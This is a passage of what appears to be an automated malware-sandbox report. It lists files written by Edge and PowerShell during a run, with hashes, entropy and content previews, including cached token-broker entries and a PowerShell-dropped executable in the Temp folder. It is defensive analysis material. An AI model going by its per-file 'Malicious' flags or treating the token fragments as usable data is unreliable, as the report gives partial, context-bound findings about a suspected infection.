                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:downloadCache_

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.953651603817042
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTf8zVHGbozRLuLgfGBkGAeekVy8Hfjg9PIAclWASW6:YWLSGT6qo9LuLgfGBPAzkVj/EMlW5W6
                                                                                                                                                                                                                                                                                                      MD5:3E90C454B10E09E61397FDCEFF50E791
                                                                                                                                                                                                                                                                                                      SHA1:8D85278F08A0E8676F7D24F0036E198D16464808
                                                                                                                                                                                                                                                                                                      SHA-256:108D63E495FFF6E70B05C4A34A90AA6FEA4DABF51CBECE053761EAFE4B8E8595
                                                                                                                                                                                                                                                                                                      SHA-512:F65C00FC9751E795CBAE1FC9E936FE4CCCE022CB04D4A9140FAE8989368A564B4B6F973DD3DD9A33798B2957DAB7512648DA9C1EE423FE9F310372B3B9AFBBD6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"2131622029cc4538","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953303053215}]}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:uriCache_

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.970989051011234
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTf8zVHGbozRLuLgfGBkGAeekVy8HfzXNPIAclWASXTS3:YWLSGT6qo9LuLgfGBPAzkVj/T8lW5A
                                                                                                                                                                                                                                                                                                      MD5:DBF618BA34123BC7084C0BFB0A477E23
                                                                                                                                                                                                                                                                                                      SHA1:8B6D1ED14D81387BAE64A8CBBEFEDFE52F60DD9B
                                                                                                                                                                                                                                                                                                      SHA-256:797423A3D2D4477997AC02E199C39DC64572F34C9D895A63B4143006E5358965
                                                                                                                                                                                                                                                                                                      SHA-512:B6EBF0774E1F8052CA84DE356DB9ACC798A5C7446177C15784ECA7E1D63441647F9AD9A88819FF08C7B9997048A5B3C819D8C95B5327CA1E9096071610D9EE55
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"2131622029cc4538","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953302673590}]}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):85
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
                                                                                                                                                                                                                                                                                                      MD5:265DB1C9337422F9AF69EF2B4E1C7205
                                                                                                                                                                                                                                                                                                      SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
                                                                                                                                                                                                                                                                                                      SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
                                                                                                                                                                                                                                                                                                      SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e07f355d-112b-433e-9915-56f77ad7320c.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):43190
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.09570456473704
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5dajNKKGf4F4MiYUwQ1d1gxkhxPFDWBOCpsqh7DRo+yM/42cRaL1:5Mk1rT8H1aCYURduVOCaI7VLyMV/YosS
                                                                                                                                                                                                                                                                                                      MD5:AB200982EA63CBA141DAC801D73A1B9A
                                                                                                                                                                                                                                                                                                      SHA1:BC2EC4321FBF1D90A57B5C65B23AA07DED398414
                                                                                                                                                                                                                                                                                                      SHA-256:94FD15AACFCDD9D2E05607167E54810A00859FE83F6FDED08DA51D690A457DBD
                                                                                                                                                                                                                                                                                                      SHA-512:6742AC813E80798F16C37EA67D269C5E2CF983459F80BAEBDB77890098C30C36381CAF616DB7086F1147C9FE4AD8336ED5A821CBFB942DB77036F9CF9C886492
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f04aa480-b5a9-4c55-94c3-61531b87d97c.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f80300d7-9338-4b44-917d-e2cd431100b5.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):46101
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.088075848061136
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5Maq/1KKGf4F4MiYUwQ1d1gHfhxPFDWBOCpsq9Cioc7DRo+yM/45:5Mk1rT8HEazYURduSOCaGFoc7VLyMV/s
                                                                                                                                                                                                                                                                                                      MD5:8D4DF3AFFE588F63BAEFB15EDCD2326E
                                                                                                                                                                                                                                                                                                      SHA1:6633DB316196CFBA5D56DFD90A65C3ACE6E5A497
                                                                                                                                                                                                                                                                                                      SHA-256:A9267ED5A70CF7100A532379BAA70F7EB0D0359C01DA27B542238F29D8D72DF0
                                                                                                                                                                                                                                                                                                      SHA-512:9FBA9D03482700BB6900280FBB9358244EE2C5CE0180B365634B646E5A0FAE68F8E6ABAF38D7FFF8405F9E745F2685C385CF07DBAF35683485F1ACD3B1110C92
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.855569343650047
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxmxl9Il8ujfXG096RDmrvzlee7d1rc:mHYdXG08RSbzleec
                                                                                                                                                                                                                                                                                                      MD5:609E7C7C95E0FB8A33CB4CC7DA934D3D
                                                                                                                                                                                                                                                                                                      SHA1:B557E36F04E0B45F13E9A1A8D62613CECA44B915
                                                                                                                                                                                                                                                                                                      SHA-256:93D2F426E3EF45C17F4EF341A42EEE002C794D9E193E47CF54B067119FB66BBF
                                                                                                                                                                                                                                                                                                      SHA-512:2C803E49E26BD8CCBE51455E1D1F7A40FE37DBC7F10D4C87B2D2648421F26E71E618846878110190C3389826C71EC8889F5DA89A83493FAA02FEF4DB9CA15D80
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.N.W.9.L.T.9.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.G.I.d.y.R.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.989236621227734
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxExJmxD9Il8u8RUuh2gj2TP1DVUpfsk9vYiIuDeRKFqTtCsUaRnTBeTxR8:uYC7h2Cs7Upfn9YuDeR1TtnUajqxQn/
                                                                                                                                                                                                                                                                                                      MD5:BC8E17E9F9241145C266785347033384
                                                                                                                                                                                                                                                                                                      SHA1:C7B385F056C26B3CDFA606FA4FFD6BEF94F754AF
                                                                                                                                                                                                                                                                                                      SHA-256:3B9DAB9D66C5CB63C6E771B87239FA21F2B0DC16ABF8BC7393E237C0A40A2FC3
                                                                                                                                                                                                                                                                                                      SHA-512:089CCCD522C9BED34C2C66A26DA0DFB0F98CECCEFB906648B10167C638852ED257D2FF89F21FFD67356F15F61509DAFCBFBE18E02DFD182BC562A98C1FA7B9F0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.N.G.w.E.T.d.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.G.I.d.y.R.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8904987606300354
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xzxl9Il8uzk+xnYD6nPQNDwl4MBQoWYlZ/9d/vc:aNY1k+xu64NclQ3YbM
                                                                                                                                                                                                                                                                                                      MD5:D40A68F0D879B0CD5B704BE5C5084A29
                                                                                                                                                                                                                                                                                                      SHA1:B82A33D2B3B1CA11FB3D7B6854B1555C4B8A92A0
                                                                                                                                                                                                                                                                                                      SHA-256:BB1F9EB5173B14C55DB63EFE19E220D37D633D39F4952F8592955F30B686E7A5
                                                                                                                                                                                                                                                                                                      SHA-512:D413FAD11E5AACAA747DDF0287A10AC03164CED1A7163ECC8CB2FDB18B94E0D090DC3E05C7D45F21EDEAE0BF163F6311F3541A710AC48CBB12C01F17F8877618
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.E.m.0.O./.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.G.I.d.y.R.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):61147
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.078058244767499
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHCqdZJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPo
                                                                                                                                                                                                                                                                                                      MD5:CAC3D4FD8DBEA030ABA96F8F780736FB
                                                                                                                                                                                                                                                                                                      SHA1:A521D280279A587EAB48E40FE300B74091C63E23
                                                                                                                                                                                                                                                                                                      SHA-256:925201D27B013B74C70BB334EFC61D2F663E600FE67DBFB102CB4C0CA1429DBB
                                                                                                                                                                                                                                                                                                      SHA-512:FCF98E71FAC2D3B6C963DCDF1610F18F0640A109C8FCC442A4076665377E110E44969C7C0EC61BABE191DC5DA922A033508AA438E057C6CA41B1E05D4FBE7FA1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                                                                                                                      MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                                                                                                                      SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                                                                                                                      SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                                                                                                                      SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1061714629.exe

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2764800
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.070345780359035
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:49152:/VHFXSzmqiDqCbm1gickVsPT1uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuTuuuu4:/VHFXSzmqsegfkVsBuuuuuuuuuuuuuu/
                                                                                                                                                                                                                                                                                                      MD5:DFED8A8BF0531716FD932A0A81CB14CD
